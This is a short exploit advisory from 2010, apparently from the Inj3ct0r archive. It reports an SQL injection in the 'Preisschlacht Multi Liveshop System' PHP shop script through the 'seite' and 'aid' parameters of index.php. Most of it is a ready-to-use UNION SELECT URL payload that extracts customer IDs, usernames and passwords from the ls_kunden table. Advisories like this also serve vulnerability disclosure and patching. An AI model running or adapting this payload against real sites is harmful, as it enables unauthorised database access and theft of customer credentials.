Preisschlacht Multi Liveshop System (seite&aid) index.ph
Posted on 17 March 2010
======================================================================= Preisschlacht Multi Liveshop System (seite&aid) index.php SQL Injection ======================================================================= ----------------------------Information------------------------------------------------ +Name : Preisschlacht Multi Liveshop System SQL Injection (seite&aid) index.php +Autor : Easy Laster +Date : 17.03.2010 +Script : Preisschlacht Multi Liveshop System +Download : ------------------ +Language :PHP +Discovered by Easy Laster ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/forum/index.php?seite=17&aid= +Exploitable : http://www.site.com/forum/index.php?seite=17&aid=111111111+union+select +1,2,concat(ID,0x3a,Benutzer,0x3a,passwort),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23+from+ls_kunden+where+id=1 ----------------------------------------------------------------------------------------- # ~ - [ [ : Inj3ct0r : ] ]